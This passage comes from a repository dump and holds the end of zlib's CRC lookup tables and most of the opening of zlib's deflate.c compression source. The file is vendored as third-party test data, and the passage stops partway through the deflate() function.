0x6af5b94d, 0x4d909ccc, 0x65398294, 0x425ca715, 0x356bbf24, 0x120e9aa5, 0x3aa784fd, 0x1dc2a17c, 0xd4c9b49f, 0xf3ac911e, 0xdb058f46, 0xfc60aac7, 0x8b57b2f6, 0xac329777, 0x849b892f, 0xa3feacae, 0x578ad232, 0x70eff7b3, 0x5846e9eb, 0x7f23cc6a, 0x0814d45b, 0x2f71f1da, 0x07d8ef82, 0x20bdca03, 0xe9b6dfe0, 0xced3fa61, 0xe67ae439, 0xc11fc1b8, 0xb628d989, 0x914dfc08, 0xb9e4e250, 0x9e81c7d1, 0x100b6fb3, 0x376e4a32, 0x1fc7546a, 0x38a271eb, 0x4f9569da, 0x68f04c5b, 0x40595203, 0x673c7782, 0xae376261, 0x895247e0, 0xa1fb59b8, 0x869e7c39, 0xf1a96408, 0xd6cc4189, 0xfe655fd1, 0xd9007a50, 0x2d7404cc, 0x0a11214d, 0x22b83f15, 0x05dd1a94, 0x72ea02a5, 0x558f2724, 0x7d26397c, 0x5a431cfd, 0x9348091e, 0xb42d2c9f, 0x9c8432c7, 0xbbe11746, 0xccd60f77, 0xebb32af6, 0xc31a34ae, 0xe47f112f, 0xdf0f656b, 0xf86a40ea, 0xd0c35eb2, 0xf7a67b33, 0x80916302, 0xa7f44683, 0x8f5d58db, 0xa8387d5a, 0x613368b9, 0x46564d38, 0x6eff5360, 0x499a76e1, 0x3ead6ed0, 0x19c84b51, 0x31615509, 0x16047088, 0xe2700e14, 0xc5152b95, 0xedbc35cd, 0xcad9104c, 0xbdee087d, 0x9a8b2dfc, 0xb22233a4, 0x95471625, 0x5c4c03c6, 0x7b292647, 0x5380381f, 0x74e51d9e, 0x03d205af, 0x24b7202e, 0x0c1e3e76, 0x2b7b1bf7, 0xa5f1b395, 0x82949614, 0xaa3d884c, 0x8d58adcd, 0xfa6fb5fc, 0xdd0a907d, 0xf5a38e25, 0xd2c6aba4, 0x1bcdbe47, 0x3ca89bc6, 0x1401859e, 0x3364a01f, 0x4453b82e, 0x63369daf, 0x4b9f83f7, 0x6cfaa676, 0x988ed8ea, 0xbfebfd6b, 0x9742e333, 0xb027c6b2, 0xc710de83, 0xe075fb02, 0xc8dce55a, 0xefb9c0db, 0x26b2d538, 0x01d7f0b9, 0x297eeee1, 0x0e1bcb60, 0x792cd351, 0x5e49f6d0, 0x76e0e888, 0x5185cd09}}; #endif #endif #endif local const z_crc_t FAR x2n_table[] = { 0x40000000, 0x20000000, 0x08000000, 0x00800000, 0x00008000, 0xedb88320, 0xb1e6b092, 0xa06a2517, 0xed627dae, 0x88d14467, 0xd7bbfe6a, 0xec447f11, 0x8e7ea170, 0x6427800e, 0x4d47bae0, 0x09fe548f, 0x83852d0f, 0x30362f1a, 0x7b5a9cc3, 0x31fec169, 0x9fec022a, 0x6c8dedc4, 0x15d6874d, 0x5fde7a4e, 0xbad90e37, 0x2e4e5eef, 0x4eaba214, 0xa8a472c0, 0x429a969e, 0x148d302a, 0xc40ba6d0, 0xc4e22c3c}; ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/deflate.c ================================================ /* deflate.c -- compress data using the deflation algorithm * Copyright (C) 1995-2023 Jean-loup Gailly and Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* * ALGORITHM * * The "deflation" process depends on being able to identify portions * of the input text which are identical to earlier input (within a * sliding window trailing behind the input currently being processed). * * The most straightforward technique turns out to be the fastest for * most input files: try all possible matches and select the longest. * The key feature of this algorithm is that insertions into the string * dictionary are very simple and thus fast, and deletions are avoided * completely. Insertions are performed at each input character, whereas * string matches are performed only when the previous match ends. So it * is preferable to spend more time in matches to allow very fast string * insertions and avoid deletions. The matching algorithm for small * strings is inspired from that of Rabin & Karp. A brute force approach * is used to find longer strings when a small match has been found. * A similar algorithm is used in comic (by Jan-Mark Wams) and freeze * (by Leonid Broukhis). * A previous version of this file used a more sophisticated algorithm * (by Fiala and Greene) which is guaranteed to run in linear amortized * time, but has a larger average cost, uses more memory and is patented. * However the F&G algorithm may be faster for some highly redundant * files if the parameter max_chain_length (described below) is too large. * * ACKNOWLEDGEMENTS * * The idea of lazy evaluation of matches is due to Jan-Mark Wams, and * I found it in 'freeze' written by Leonid Broukhis. * Thanks to many people for bug reports and testing. * * REFERENCES * * Deutsch, L.P.,"DEFLATE Compressed Data Format Specification". * Available in http://tools.ietf.org/html/rfc1951 * * A description of the Rabin and Karp algorithm is given in the book * "Algorithms" by R. Sedgewick, Addison-Wesley, p252. * * Fiala,E.R., and Greene,D.H. * Data Compression with Finite Windows, Comm.ACM, 32,4 (1989) 490-595 * */ /* @(#) $Id$ */ #include "deflate.h" const char deflate_copyright[] = " deflate 1.3 Copyright 1995-2023 Jean-loup Gailly and Mark Adler "; /* If you use the zlib library in a product, an acknowledgment is welcome in the documentation of your product. If for some reason you cannot include such an acknowledgment, I would appreciate that you keep this copyright string in the executable of your product. */ typedef enum { need_more, /* block not completed, need more input or more output */ block_done, /* block flush performed */ finish_started, /* finish started, need only more output at next deflate */ finish_done /* finish done, accept no more input or output */ } block_state; typedef block_state (*compress_func)(deflate_state *s, int flush); /* Compression function. Returns the block state after the call. */ local block_state deflate_stored(deflate_state *s, int flush); local block_state deflate_fast(deflate_state *s, int flush); #ifndef FASTEST local block_state deflate_slow(deflate_state *s, int flush); #endif local block_state deflate_rle(deflate_state *s, int flush); local block_state deflate_huff(deflate_state *s, int flush); /* =========================================================================== * Local data */ #define NIL 0 /* Tail of hash chains */ #ifndef TOO_FAR # define TOO_FAR 4096 #endif /* Matches of length 3 are discarded if their distance exceeds TOO_FAR */ /* Values for max_lazy_match, good_match and max_chain_length, depending on * the desired pack level (0..9). The values given below have been tuned to * exclude worst case performance for pathological files. Better values may be * found for specific files. */ typedef struct config_s { ush good_length; /* reduce lazy search above this match length */ ush max_lazy; /* do not perform lazy search above this match length */ ush nice_length; /* quit search above this match length */ ush max_chain; compress_func func; } config; #ifdef FASTEST local const config configuration_table[2] = { /* good lazy nice chain */ /* 0 */ {0, 0, 0, 0, deflate_stored}, /* store only */ /* 1 */ {4, 4, 8, 4, deflate_fast}}; /* max speed, no lazy matches */ #else local const config configuration_table[10] = { /* good lazy nice chain */ /* 0 */ {0, 0, 0, 0, deflate_stored}, /* store only */ /* 1 */ {4, 4, 8, 4, deflate_fast}, /* max speed, no lazy matches */ /* 2 */ {4, 5, 16, 8, deflate_fast}, /* 3 */ {4, 6, 32, 32, deflate_fast}, /* 4 */ {4, 4, 16, 16, deflate_slow}, /* lazy matches */ /* 5 */ {8, 16, 32, 32, deflate_slow}, /* 6 */ {8, 16, 128, 128, deflate_slow}, /* 7 */ {8, 32, 128, 256, deflate_slow}, /* 8 */ {32, 128, 258, 1024, deflate_slow}, /* 9 */ {32, 258, 258, 4096, deflate_slow}}; /* max compression */ #endif /* Note: the deflate() code requires max_lazy >= MIN_MATCH and max_chain >= 4 * For deflate_fast() (levels <= 3) good is ignored and lazy has a different * meaning. */ /* rank Z_BLOCK between Z_NO_FLUSH and Z_PARTIAL_FLUSH */ #define RANK(f) (((f) * 2) - ((f) > 4 ? 9 : 0)) /* =========================================================================== * Update a hash value with the given input byte * IN assertion: all calls to UPDATE_HASH are made with consecutive input * characters, so that a running hash key can be computed from the previous * key instead of complete recalculation each time. */ #define UPDATE_HASH(s,h,c) (h = (((h) << s->hash_shift) ^ (c)) & s->hash_mask) /* =========================================================================== * Insert string str in the dictionary and set match_head to the previous head * of the hash chain (the most recent string with same hash key). Return * the previous length of the hash chain. * If this file is compiled with -DFASTEST, the compression level is forced * to 1, and no hash chains are maintained. * IN assertion: all calls to INSERT_STRING are made with consecutive input * characters and the first MIN_MATCH bytes of str are valid (except for * the last MIN_MATCH-1 bytes of the input file). */ #ifdef FASTEST #define INSERT_STRING(s, str, match_head) \ (UPDATE_HASH(s, s->ins_h, s->window[(str) + (MIN_MATCH-1)]), \ match_head = s->head[s->ins_h], \ s->head[s->ins_h] = (Pos)(str)) #else #define INSERT_STRING(s, str, match_head) \ (UPDATE_HASH(s, s->ins_h, s->window[(str) + (MIN_MATCH-1)]), \ match_head = s->prev[(str) & s->w_mask] = s->head[s->ins_h], \ s->head[s->ins_h] = (Pos)(str)) #endif /* =========================================================================== * Initialize the hash table (avoiding 64K overflow for 16 bit systems). * prev[] will be initialized on the fly. */ #define CLEAR_HASH(s) \ do { \ s->head[s->hash_size - 1] = NIL; \ zmemzero((Bytef *)s->head, \ (unsigned)(s->hash_size - 1)*sizeof(*s->head)); \ } while (0) /* =========================================================================== * Slide the hash table when sliding the window down (could be avoided with 32 * bit values at the expense of memory usage). We slide even when level == 0 to * keep the hash table consistent if we switch back to level > 0 later. */ #if defined(__has_feature) # if __has_feature(memory_sanitizer) __attribute__((no_sanitize("memory"))) # endif #endif local void slide_hash(deflate_state *s) { unsigned n, m; Posf *p; uInt wsize = s->w_size; n = s->hash_size; p = &s->head[n]; do { m = *--p; *p = (Pos)(m >= wsize ? m - wsize : NIL); } while (--n); n = wsize; #ifndef FASTEST p = &s->prev[n]; do { m = *--p; *p = (Pos)(m >= wsize ? m - wsize : NIL); /* If n is not on any hash chain, prev[n] is garbage but * its value will never be used. */ } while (--n); #endif } /* =========================================================================== * Read a new buffer from the current input stream, update the adler32 * and total number of bytes read. All deflate() input goes through * this function so some applications may wish to modify it to avoid * allocating a large strm->next_in buffer and copying from it. * (See also flush_pending()). */ local unsigned read_buf(z_streamp strm, Bytef *buf, unsigned size) { unsigned len = strm->avail_in; if (len > size) len = size; if (len == 0) return 0; strm->avail_in -= len; zmemcpy(buf, strm->next_in, len); if (strm->state->wrap == 1) { strm->adler = adler32(strm->adler, buf, len); } #ifdef GZIP else if (strm->state->wrap == 2) { strm->adler = crc32(strm->adler, buf, len); } #endif strm->next_in += len; strm->total_in += len; return len; } /* =========================================================================== * Fill the window when the lookahead becomes insufficient. * Updates strstart and lookahead. * * IN assertion: lookahead < MIN_LOOKAHEAD * OUT assertions: strstart <= window_size-MIN_LOOKAHEAD * At least one byte has been read, or avail_in == 0; reads are * performed for at least two bytes (required for the zip translate_eol * option -- not supported here). */ local void fill_window(deflate_state *s) { unsigned n; unsigned more; /* Amount of free space at the end of the window. */ uInt wsize = s->w_size; Assert(s->lookahead < MIN_LOOKAHEAD, "already enough lookahead"); do { more = (unsigned)(s->window_size -(ulg)s->lookahead -(ulg)s->strstart); /* Deal with !@#$% 64K limit: */ if (sizeof(int) <= 2) { if (more == 0 && s->strstart == 0 && s->lookahead == 0) { more = wsize; } else if (more == (unsigned)(-1)) { /* Very unlikely, but possible on 16 bit machine if * strstart == 0 && lookahead == 1 (input done a byte at time) */ more--; } } /* If the window is almost full and there is insufficient lookahead, * move the upper half to the lower one to make room in the upper half. */ if (s->strstart >= wsize + MAX_DIST(s)) { zmemcpy(s->window, s->window + wsize, (unsigned)wsize - more); s->match_start -= wsize; s->strstart -= wsize; /* we now have strstart >= MAX_DIST */ s->block_start -= (long) wsize; if (s->insert > s->strstart) s->insert = s->strstart; slide_hash(s); more += wsize; } if (s->strm->avail_in == 0) break; /* If there was no sliding: * strstart <= WSIZE+MAX_DIST-1 && lookahead <= MIN_LOOKAHEAD - 1 && * more == window_size - lookahead - strstart * => more >= window_size - (MIN_LOOKAHEAD-1 + WSIZE + MAX_DIST-1) * => more >= window_size - 2*WSIZE + 2 * In the BIG_MEM or MMAP case (not yet supported), * window_size == input_size + MIN_LOOKAHEAD && * strstart + s->lookahead <= input_size => more >= MIN_LOOKAHEAD. * Otherwise, window_size == 2*WSIZE so more >= 2. * If there was sliding, more >= WSIZE. So in all cases, more >= 2. */ Assert(more >= 2, "more < 2"); n = read_buf(s->strm, s->window + s->strstart + s->lookahead, more); s->lookahead += n; /* Initialize the hash value now that we have some input: */ if (s->lookahead + s->insert >= MIN_MATCH) { uInt str = s->strstart - s->insert; s->ins_h = s->window[str]; UPDATE_HASH(s, s->ins_h, s->window[str + 1]); #if MIN_MATCH != 3 Call UPDATE_HASH() MIN_MATCH-3 more times #endif while (s->insert) { UPDATE_HASH(s, s->ins_h, s->window[str + MIN_MATCH-1]); #ifndef FASTEST s->prev[str & s->w_mask] = s->head[s->ins_h]; #endif s->head[s->ins_h] = (Pos)str; str++; s->insert--; if (s->lookahead + s->insert < MIN_MATCH) break; } } /* If the whole input has less than MIN_MATCH bytes, ins_h is garbage, * but this is not important since only literal bytes will be emitted. */ } while (s->lookahead < MIN_LOOKAHEAD && s->strm->avail_in != 0); /* If the WIN_INIT bytes after the end of the current data have never been * written, then zero those bytes in order to avoid memory check reports of * the use of uninitialized (or uninitialised as Julian writes) bytes by * the longest match routines. Update the high water mark for the next * time through here. WIN_INIT is set to MAX_MATCH since the longest match * routines allow scanning to strstart + MAX_MATCH, ignoring lookahead. */ if (s->high_water < s->window_size) { ulg curr = s->strstart + (ulg)(s->lookahead); ulg init; if (s->high_water < curr) { /* Previous high water mark below current data -- zero WIN_INIT * bytes or up to end of window, whichever is less. */ init = s->window_size - curr; if (init > WIN_INIT) init = WIN_INIT; zmemzero(s->window + curr, (unsigned)init); s->high_water = curr + init; } else if (s->high_water < (ulg)curr + WIN_INIT) { /* High water mark at or above current data, but below current data * plus WIN_INIT -- zero out to current data plus WIN_INIT, or up * to end of window, whichever is less. */ init = (ulg)curr + WIN_INIT - s->high_water; if (init > s->window_size - s->high_water) init = s->window_size - s->high_water; zmemzero(s->window + s->high_water, (unsigned)init); s->high_water += init; } } Assert((ulg)s->strstart <= s->window_size - MIN_LOOKAHEAD, "not enough room for search"); } /* ========================================================================= */ int ZEXPORT deflateInit_(z_streamp strm, int level, const char *version, int stream_size) { return deflateInit2_(strm, level, Z_DEFLATED, MAX_WBITS, DEF_MEM_LEVEL, Z_DEFAULT_STRATEGY, version, stream_size); /* To do: ignore strm->next_in if we use it as window */ } /* ========================================================================= */ int ZEXPORT deflateInit2_(z_streamp strm, int level, int method, int windowBits, int memLevel, int strategy, const char *version, int stream_size) { deflate_state *s; int wrap = 1; static const char my_version[] = ZLIB_VERSION; if (version == Z_NULL || version[0] != my_version[0] || stream_size != sizeof(z_stream)) { return Z_VERSION_ERROR; } if (strm == Z_NULL) return Z_STREAM_ERROR; strm->msg = Z_NULL; if (strm->zalloc == (alloc_func)0) { #ifdef Z_SOLO return Z_STREAM_ERROR; #else strm->zalloc = zcalloc; strm->opaque = (voidpf)0; #endif } if (strm->zfree == (free_func)0) #ifdef Z_SOLO return Z_STREAM_ERROR; #else strm->zfree = zcfree; #endif #ifdef FASTEST if (level != 0) level = 1; #else if (level == Z_DEFAULT_COMPRESSION) level = 6; #endif if (windowBits < 0) { /* suppress zlib wrapper */ wrap = 0; if (windowBits < -15) return Z_STREAM_ERROR; windowBits = -windowBits; } #ifdef GZIP else if (windowBits > 15) { wrap = 2; /* write gzip wrapper instead */ windowBits -= 16; } #endif if (memLevel < 1 || memLevel > MAX_MEM_LEVEL || method != Z_DEFLATED || windowBits < 8 || windowBits > 15 || level < 0 || level > 9 || strategy < 0 || strategy > Z_FIXED || (windowBits == 8 && wrap != 1)) { return Z_STREAM_ERROR; } if (windowBits == 8) windowBits = 9; /* until 256-byte window bug fixed */ s = (deflate_state *) ZALLOC(strm, 1, sizeof(deflate_state)); if (s == Z_NULL) return Z_MEM_ERROR; strm->state = (struct internal_state FAR *)s; s->strm = strm; s->status = INIT_STATE; /* to pass state test in deflateReset() */ s->wrap = wrap; s->gzhead = Z_NULL; s->w_bits = (uInt)windowBits; s->w_size = 1 << s->w_bits; s->w_mask = s->w_size - 1; s->hash_bits = (uInt)memLevel + 7; s->hash_size = 1 << s->hash_bits; s->hash_mask = s->hash_size - 1; s->hash_shift = ((s->hash_bits + MIN_MATCH-1) / MIN_MATCH); s->window = (Bytef *) ZALLOC(strm, s->w_size, 2*sizeof(Byte)); s->prev = (Posf *) ZALLOC(strm, s->w_size, sizeof(Pos)); s->head = (Posf *) ZALLOC(strm, s->hash_size, sizeof(Pos)); s->high_water = 0; /* nothing written to s->window yet */ s->lit_bufsize = 1 << (memLevel + 6); /* 16K elements by default */ /* We overlay pending_buf and sym_buf. This works since the average size * for length/distance pairs over any compressed block is assured to be 31 * bits or less. * * Analysis: The longest fixed codes are a length code of 8 bits plus 5 * extra bits, for lengths 131 to 257. The longest fixed distance codes are * 5 bits plus 13 extra bits, for distances 16385 to 32768. The longest * possible fixed-codes length/distance pair is then 31 bits total. * * sym_buf starts one-fourth of the way into pending_buf. So there are * three bytes in sym_buf for every four bytes in pending_buf. Each symbol * in sym_buf is three bytes -- two for the distance and one for the * literal/length. As each symbol is consumed, the pointer to the next * sym_buf value to read moves forward three bytes. From that symbol, up to * 31 bits are written to pending_buf. The closest the written pending_buf * bits gets to the next sym_buf symbol to read is just before the last * code is written. At that time, 31*(n - 2) bits have been written, just * after 24*(n - 2) bits have been consumed from sym_buf. sym_buf starts at * 8*n bits into pending_buf. (Note that the symbol buffer fills when n - 1 * symbols are written.) The closest the writing gets to what is unread is * then n + 14 bits. Here n is lit_bufsize, which is 16384 by default, and * can range from 128 to 32768. * * Therefore, at a minimum, there are 142 bits of space between what is * written and what is read in the overlain buffers, so the symbols cannot * be overwritten by the compressed data. That space is actually 139 bits, * due to the three-bit fixed-code block header. * * That covers the case where either Z_FIXED is specified, forcing fixed * codes, or when the use of fixed codes is chosen, because that choice * results in a smaller compressed block than dynamic codes. That latter * condition then assures that the above analysis also covers all dynamic * blocks. A dynamic-code block will only be chosen to be emitted if it has * fewer bits than a fixed-code block would for the same set of symbols. * Therefore its average symbol length is assured to be less than 31. So * the compressed data for a dynamic block also cannot overwrite the * symbols from which it is being constructed. */ s->pending_buf = (uchf *) ZALLOC(strm, s->lit_bufsize, 4); s->pending_buf_size = (ulg)s->lit_bufsize * 4; if (s->window == Z_NULL || s->prev == Z_NULL || s->head == Z_NULL || s->pending_buf == Z_NULL) { s->status = FINISH_STATE; strm->msg = ERR_MSG(Z_MEM_ERROR); deflateEnd (strm); return Z_MEM_ERROR; } s->sym_buf = s->pending_buf + s->lit_bufsize; s->sym_end = (s->lit_bufsize - 1) * 3; /* We avoid equality with lit_bufsize*3 because of wraparound at 64K * on 16 bit machines and because stored blocks are restricted to * 64K-1 bytes. */ s->level = level; s->strategy = strategy; s->method = (Byte)method; return deflateReset(strm); } /* ========================================================================= * Check for a valid deflate stream state. Return 0 if ok, 1 if not. */ local int deflateStateCheck(z_streamp strm) { deflate_state *s; if (strm == Z_NULL || strm->zalloc == (alloc_func)0 || strm->zfree == (free_func)0) return 1; s = strm->state; if (s == Z_NULL || s->strm != strm || (s->status != INIT_STATE && #ifdef GZIP s->status != GZIP_STATE && #endif s->status != EXTRA_STATE && s->status != NAME_STATE && s->status != COMMENT_STATE && s->status != HCRC_STATE && s->status != BUSY_STATE && s->status != FINISH_STATE)) return 1; return 0; } /* ========================================================================= */ int ZEXPORT deflateSetDictionary(z_streamp strm, const Bytef *dictionary, uInt dictLength) { deflate_state *s; uInt str, n; int wrap; unsigned avail; z_const unsigned char *next; if (deflateStateCheck(strm) || dictionary == Z_NULL) return Z_STREAM_ERROR; s = strm->state; wrap = s->wrap; if (wrap == 2 || (wrap == 1 && s->status != INIT_STATE) || s->lookahead) return Z_STREAM_ERROR; /* when using zlib wrappers, compute Adler-32 for provided dictionary */ if (wrap == 1) strm->adler = adler32(strm->adler, dictionary, dictLength); s->wrap = 0; /* avoid computing Adler-32 in read_buf */ /* if dictionary would fill window, just replace the history */ if (dictLength >= s->w_size) { if (wrap == 0) { /* already empty otherwise */ CLEAR_HASH(s); s->strstart = 0; s->block_start = 0L; s->insert = 0; } dictionary += dictLength - s->w_size; /* use the tail */ dictLength = s->w_size; } /* insert dictionary into window and hash */ avail = strm->avail_in; next = strm->next_in; strm->avail_in = dictLength; strm->next_in = (z_const Bytef *)dictionary; fill_window(s); while (s->lookahead >= MIN_MATCH) { str = s->strstart; n = s->lookahead - (MIN_MATCH-1); do { UPDATE_HASH(s, s->ins_h, s->window[str + MIN_MATCH-1]); #ifndef FASTEST s->prev[str & s->w_mask] = s->head[s->ins_h]; #endif s->head[s->ins_h] = (Pos)str; str++; } while (--n); s->strstart = str; s->lookahead = MIN_MATCH-1; fill_window(s); } s->strstart += s->lookahead; s->block_start = (long)s->strstart; s->insert = s->lookahead; s->lookahead = 0; s->match_length = s->prev_length = MIN_MATCH-1; s->match_available = 0; strm->next_in = next; strm->avail_in = avail; s->wrap = wrap; return Z_OK; } /* ========================================================================= */ int ZEXPORT deflateGetDictionary(z_streamp strm, Bytef *dictionary, uInt *dictLength) { deflate_state *s; uInt len; if (deflateStateCheck(strm)) return Z_STREAM_ERROR; s = strm->state; len = s->strstart + s->lookahead; if (len > s->w_size) len = s->w_size; if (dictionary != Z_NULL && len) zmemcpy(dictionary, s->window + s->strstart + s->lookahead - len, len); if (dictLength != Z_NULL) *dictLength = len; return Z_OK; } /* ========================================================================= */ int ZEXPORT deflateResetKeep(z_streamp strm) { deflate_state *s; if (deflateStateCheck(strm)) { return Z_STREAM_ERROR; } strm->total_in = strm->total_out = 0; strm->msg = Z_NULL; /* use zfree if we ever allocate msg dynamically */ strm->data_type = Z_UNKNOWN; s = (deflate_state *)strm->state; s->pending = 0; s->pending_out = s->pending_buf; if (s->wrap < 0) { s->wrap = -s->wrap; /* was made negative by deflate(..., Z_FINISH); */ } s->status = #ifdef GZIP s->wrap == 2 ? GZIP_STATE : #endif INIT_STATE; strm->adler = #ifdef GZIP s->wrap == 2 ? crc32(0L, Z_NULL, 0) : #endif adler32(0L, Z_NULL, 0); s->last_flush = -2; _tr_init(s); return Z_OK; } /* =========================================================================== * Initialize the "longest match" routines for a new zlib stream */ local void lm_init(deflate_state *s) { s->window_size = (ulg)2L*s->w_size; CLEAR_HASH(s); /* Set the default configuration parameters: */ s->max_lazy_match = configuration_table[s->level].max_lazy; s->good_match = configuration_table[s->level].good_length; s->nice_match = configuration_table[s->level].nice_length; s->max_chain_length = configuration_table[s->level].max_chain; s->strstart = 0; s->block_start = 0L; s->lookahead = 0; s->insert = 0; s->match_length = s->prev_length = MIN_MATCH-1; s->match_available = 0; s->ins_h = 0; } /* ========================================================================= */ int ZEXPORT deflateReset(z_streamp strm) { int ret; ret = deflateResetKeep(strm); if (ret == Z_OK) lm_init(strm->state); return ret; } /* ========================================================================= */ int ZEXPORT deflateSetHeader(z_streamp strm, gz_headerp head) { if (deflateStateCheck(strm) || strm->state->wrap != 2) return Z_STREAM_ERROR; strm->state->gzhead = head; return Z_OK; } /* ========================================================================= */ int ZEXPORT deflatePending(z_streamp strm, unsigned *pending, int *bits) { if (deflateStateCheck(strm)) return Z_STREAM_ERROR; if (pending != Z_NULL) *pending = strm->state->pending; if (bits != Z_NULL) *bits = strm->state->bi_valid; return Z_OK; } /* ========================================================================= */ int ZEXPORT deflatePrime(z_streamp strm, int bits, int value) { deflate_state *s; int put; if (deflateStateCheck(strm)) return Z_STREAM_ERROR; s = strm->state; if (bits < 0 || bits > 16 || s->sym_buf < s->pending_out + ((Buf_size + 7) >> 3)) return Z_BUF_ERROR; do { put = Buf_size - s->bi_valid; if (put > bits) put = bits; s->bi_buf |= (ush)((value & ((1 << put) - 1)) << s->bi_valid); s->bi_valid += put; _tr_flush_bits(s); value >>= put; bits -= put; } while (bits); return Z_OK; } /* ========================================================================= */ int ZEXPORT deflateParams(z_streamp strm, int level, int strategy) { deflate_state *s; compress_func func; if (deflateStateCheck(strm)) return Z_STREAM_ERROR; s = strm->state; #ifdef FASTEST if (level != 0) level = 1; #else if (level == Z_DEFAULT_COMPRESSION) level = 6; #endif if (level < 0 || level > 9 || strategy < 0 || strategy > Z_FIXED) { return Z_STREAM_ERROR; } func = configuration_table[s->level].func; if ((strategy != s->strategy || func != configuration_table[level].func) && s->last_flush != -2) { /* Flush the last buffer: */ int err = deflate(strm, Z_BLOCK); if (err == Z_STREAM_ERROR) return err; if (strm->avail_in || (s->strstart - s->block_start) + s->lookahead) return Z_BUF_ERROR; } if (s->level != level) { if (s->level == 0 && s->matches != 0) { if (s->matches == 1) slide_hash(s); else CLEAR_HASH(s); s->matches = 0; } s->level = level; s->max_lazy_match = configuration_table[level].max_lazy; s->good_match = configuration_table[level].good_length; s->nice_match = configuration_table[level].nice_length; s->max_chain_length = configuration_table[level].max_chain; } s->strategy = strategy; return Z_OK; } /* ========================================================================= */ int ZEXPORT deflateTune(z_streamp strm, int good_length, int max_lazy, int nice_length, int max_chain) { deflate_state *s; if (deflateStateCheck(strm)) return Z_STREAM_ERROR; s = strm->state; s->good_match = (uInt)good_length; s->max_lazy_match = (uInt)max_lazy; s->nice_match = nice_length; s->max_chain_length = (uInt)max_chain; return Z_OK; } /* ========================================================================= * For the default windowBits of 15 and memLevel of 8, this function returns a * close to exact, as well as small, upper bound on the compressed size. This * is an expansion of ~0.03%, plus a small constant. * * For any setting other than those defaults for windowBits and memLevel, one * of two worst case bounds is returned. This is at most an expansion of ~4% or * ~13%, plus a small constant. * * Both the 0.03% and 4% derive from the overhead of stored blocks. The first * one is for stored blocks of 16383 bytes (memLevel == 8), whereas the second * is for stored blocks of 127 bytes (the worst case memLevel == 1). The * expansion results from five bytes of header for each stored block. * * The larger expansion of 13% results from a window size less than or equal to * the symbols buffer size (windowBits <= memLevel + 7). In that case some of * the data being compressed may have slid out of the sliding window, impeding * a stored block from being emitted. Then the only choice is a fixed or * dynamic block, where a fixed block limits the maximum expansion to 9 bits * per 8-bit byte, plus 10 bits for every block. The smallest block size for * which this can occur is 255 (memLevel == 2). * * Shifts are used to approximate divisions, for speed. */ uLong ZEXPORT deflateBound(z_streamp strm, uLong sourceLen) { deflate_state *s; uLong fixedlen, storelen, wraplen; /* upper bound for fixed blocks with 9-bit literals and length 255 (memLevel == 2, which is the lowest that may not use stored blocks) -- ~13% overhead plus a small constant */ fixedlen = sourceLen + (sourceLen >> 3) + (sourceLen >> 8) + (sourceLen >> 9) + 4; /* upper bound for stored blocks with length 127 (memLevel == 1) -- ~4% overhead plus a small constant */ storelen = sourceLen + (sourceLen >> 5) + (sourceLen >> 7) + (sourceLen >> 11) + 7; /* if can't get parameters, return larger bound plus a zlib wrapper */ if (deflateStateCheck(strm)) return (fixedlen > storelen ? fixedlen : storelen) + 6; /* compute wrapper length */ s = strm->state; switch (s->wrap) { case 0: /* raw deflate */ wraplen = 0; break; case 1: /* zlib wrapper */ wraplen = 6 + (s->strstart ? 4 : 0); break; #ifdef GZIP case 2: /* gzip wrapper */ wraplen = 18; if (s->gzhead != Z_NULL) { /* user-supplied gzip header */ Bytef *str; if (s->gzhead->extra != Z_NULL) wraplen += 2 + s->gzhead->extra_len; str = s->gzhead->name; if (str != Z_NULL) do { wraplen++; } while (*str++); str = s->gzhead->comment; if (str != Z_NULL) do { wraplen++; } while (*str++); if (s->gzhead->hcrc) wraplen += 2; } break; #endif default: /* for compiler happiness */ wraplen = 6; } /* if not default parameters, return one of the conservative bounds */ if (s->w_bits != 15 || s->hash_bits != 8 + 7) return (s->w_bits <= s->hash_bits && s->level ? fixedlen : storelen) + wraplen; /* default settings: return tight bound for that case -- ~0.03% overhead plus a small constant */ return sourceLen + (sourceLen >> 12) + (sourceLen >> 14) + (sourceLen >> 25) + 13 - 6 + wraplen; } /* ========================================================================= * Put a short in the pending buffer. The 16-bit value is put in MSB order. * IN assertion: the stream state is correct and there is enough room in * pending_buf. */ local void putShortMSB(deflate_state *s, uInt b) { put_byte(s, (Byte)(b >> 8)); put_byte(s, (Byte)(b & 0xff)); } /* ========================================================================= * Flush as much pending output as possible. All deflate() output, except for * some deflate_stored() output, goes through this function so some * applications may wish to modify it to avoid allocating a large * strm->next_out buffer and copying into it. (See also read_buf()). */ local void flush_pending(z_streamp strm) { unsigned len; deflate_state *s = strm->state; _tr_flush_bits(s); len = s->pending; if (len > strm->avail_out) len = strm->avail_out; if (len == 0) return; zmemcpy(strm->next_out, s->pending_out, len); strm->next_out += len; s->pending_out += len; strm->total_out += len; strm->avail_out -= len; s->pending -= len; if (s->pending == 0) { s->pending_out = s->pending_buf; } } /* =========================================================================== * Update the header CRC with the bytes s->pending_buf[beg..s->pending - 1]. */ #define HCRC_UPDATE(beg) \ do { \ if (s->gzhead->hcrc && s->pending > (beg)) \ strm->adler = crc32(strm->adler, s->pending_buf + (beg), \ s->pending - (beg)); \ } while (0) /* ========================================================================= */ int ZEXPORT deflate(z_streamp strm, int flush) { int old_flush; /* value of flush param for previous deflate call */ deflate_state *s; if (deflateStateCheck(strm) || flush > Z_BLOCK || flush < 0) { return Z_STREAM_ERROR; } s = strm->state; if (strm->next_out == Z_NULL || (strm->avail_in != 0 && strm->next_in == Z_NULL) || (s->status == FINISH_STATE && flush != Z_FINISH)) { ERR_RETURN(strm, Z_STREAM_ERROR); } if (strm->avail_out == 0) ERR_RETURN(strm, Z_BUF_ERROR); old_flush = s->last_flush; s->last_flush = flush; /* Flush as much pending output as possible */ if (s->pending != 0) { flush_pending(strm); if (strm->avail_out == 0) { /* Since avail_out is 0, deflate will be called again with * more output space, but possibly with both pending and * avail_in equal to zero. There won't be anything to do, * but this is not an error situation so make sure we * return OK instead of BUF_ERROR at next call of deflate: */ s->last_flush = -1; return Z_OK; } /* Make sure there is something to do and avoid duplicate consecutive * flushes. For repeated and useless calls with Z_FINISH, we keep * returning Z_STREAM_END instead of Z_BUF_ERROR. */ } else if (strm->avail_in == 0 && RANK(flush) <= RANK(old_flush) && flush != Z_FINISH) { ERR_RETURN(strm, Z_BUF_ERROR); } /* User must not provide more input after the first FINISH: */ if (s->status == FINISH_STATE && strm->avail_in != 0) { ERR_RETURN(strm, Z_BUF_ERROR); } /* Write the header */ if (s->status == INIT_STATE && s->wrap == 0) s->status = BUSY_STATE; if 